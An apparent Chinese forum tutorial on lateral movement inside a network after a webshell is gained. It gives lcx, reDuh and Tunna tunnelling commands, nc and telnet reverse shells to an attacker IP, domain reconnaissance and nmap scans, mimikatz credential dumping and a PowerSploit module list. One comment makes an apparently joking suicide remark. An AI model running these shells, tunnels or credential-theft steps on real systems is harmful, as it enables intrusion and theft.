-
-
[原创]内网渗透
-
发表于: 2017-7-9 17:02
-
当我们获取到一个webshell的时候,发现外网ip无法链接,但3389开放,那很有可能是内网服务器,下面我们将介绍几款有关内网转发的工具。
内网转发的工具
1、Lcx.exe工具使用
首先远程目标系统要开启远程访问功能(若未开可通过开3389命令开启).
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。
首先在本地进行监听,监听51端口并转发到33891端口
lcx.exe -listen 51 33891
在webshell中运行
lcx.exe -slave 192.168.1.100 51 192.168.80.139 3389
远程桌面访问33891端口
使用创建的用户名密码登录服务器
2、Reduh内网反弹
服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本地要安装jdk。
这里我们以php网站为例,首先将php文件上传到服务器端。
浏览器中访问上传的webshell,提示以下内容说明解析成功
用客户端连接服务端
java -jar reDuhClient.jar http://192.168.80.139/zvuldrill/reDuh.php
本地连接1010端口
nc.exe -vv localhost 1010 [createTunnel]1235:127.0.0.1:3389
远程登录
3、Tunna内网反弹
以下为后门文件,该工具是Python所写,需要Python环境,同样有jsp、aspx、php版本的webshell
这里使用php网站进行测试,上传php后门
python proxy.py -u http://192.168.80.139/zvuldrill/conn.php -l 1234 -r 3389 -v –s
远程连接
4、Linux系统通过nc反弹shell
首先,攻击端进行监听
nc.exe -lvnp 2333
服务器端执行
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.1.101 2333 1>/tmp/backpipe
Ip为攻击端ip
执行命令,查看发现反弹成功
5、内置命令反弹
nc.exe -lvnp 2333
服务器端执行
mknod /tmp/backpipe p
telnet 192.168.1.101 2333 0<backpipe | /bin/bash 1>backpipe
反弹成功
获取更多服务器
上面讲了我们如何进入进入一台内网系统,既然我们已经获得了一台内网服务,那么我们如何获取更多服务器呢
我们可能会想到目标系统是什么,安装了哪些应用,可能存在的漏洞等等。
同样,我们需要收集信息,来帮助更好的入侵其他主机,下面是一些常用的cmd命令,还有很多可自行学习
net user ------ 本机用户列表 net localhroup administrators ------ 本机管理员[通常含有域用户] net user /domain ------ 查询域用户 net group /domain ------ 查询域里面的工作组 net group "domain admins" /domain ------ 查询域管理员用户组 net localgroup administrators /domain ------ 登录本机的域管理员 net time /domain ------ 判断主域,主域服务器都做时间服务器 net config workstation ------ 当前登录域
密码获取
既然已经拿下服务器,那么我们就要获得服务器的密码,windows可以使用mimikatz获取用户名及密码,因为很有可能管理员将其他系统设置成相同的用户名密码。所以在其他内网系统可能同样适用。
可以看到既有hash值,也有明文用户名密码。
主机探测
既然已经在一个内网,我们首先应该想到的就是探测有什么服务器,有哪些开放端口等等,可以使用nmap,扫描C段,看看有多少台在线服务器。
扫描存活主机,既然是扫描存活主机,那么当然越快越好(个人喜好)
nmap -PE -sn -T4 192.168.80.1/24
我们已经知道那些ip是存活主机,那么就可以进一步获取各个系统的开放端口
nmap -sS -sV -O -p0-65535 192.168.80.145
可以看到开放的端口以及服务等服务器信息
同样,在内网也会存在很多不打系统补丁的情况,类似这次“WannaCry”虽然补丁已经出现一段时间,各大安全公司也好,各个安全部门也好都会提前预警打补丁,但是呢,你懂的,所以说,对某些不需要使用的端口及服务,直接停掉,以免临时抱佛脚,伤不起啊……
如果有系统漏洞,那么我们就可以使用matesploit进行溢出攻击等等
弱口令
同样,弱口令也是内网拿服务器的手段,说到弱口令就不得不说1433的mssql,3306的mysql,1521的Oracle,10050 的zabbix,7001的weblogic,8080的tomcat等等,都会存在弱口令的情况,但也存在被修改的情况,不过管理员嘛都是怕麻烦,会存在各种规律以免自己忘记,甚至有些管理员直接将某些账号密码写到某个文件夹中,这看你喽……
嗅探
也可以使用嗅探方法,如Cain,可以探测本地程序缓存的密码,通过嗅探器可以嗅探到相邻机器的username和password.。
powershell & PowerSploit
powershell
powershell基础学习,如果想了解powershell渗透测试原理,需要进行简单脚本开发。推荐网址:http://www.pstips.net/powershell-executing-external-commands.html
基础部分就不给大家在细介绍,大家可以根据提供网址进行学习。
Powershell的优秀之处
1. 代码运行在内存中可以不去接触磁盘 2. 从另一个系统中下载代码并执行 3. 很多安全产品并不能监测到powershell的活动 4. cmd.exe通常被阻止运行,但是powershell不会。
本次主要是简单介绍下powersploit,后续会出一套关于powershell系列课程。
PowerSploit
PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。
项目地址:https://github.com/PowerShellMafia/PowerSploit
代码执行(CodeExecution)
Invoke-DllInjection
Invoke-ReflectivePEInjection
Invoke-Shellcode
Invoke-WmiCommand
脚本修改(ScriptModification)
Out-EncodedCommand
Out-CompressedDll
Out-EncryptedScript
Remove-Comments
权限维持(Persistence)
New-UserPersistenceOption
New-ElevatedPersistenceOption
Add-Persistence
Install-SSP
Get-SecurityPackages
绕过杀毒软件(AntivirusBypass)
Find-AVSignature
信息收集(Exfiltration)
这个文件夹主要是收集目标主机上的信息。
信息侦察(Recon)
这个文件夹主要是以目标主机为跳板进行内网主机侦察。
由于公众号长度不可控,下节会接着讲powershell系列,利用powershell进行内网渗透、密码嗅探、端口扫描等操作。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
看不太懂怎么办?我要去自杀
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
大佬们 有内网渗透的CVE复现教程推荐么
|
|
|
|
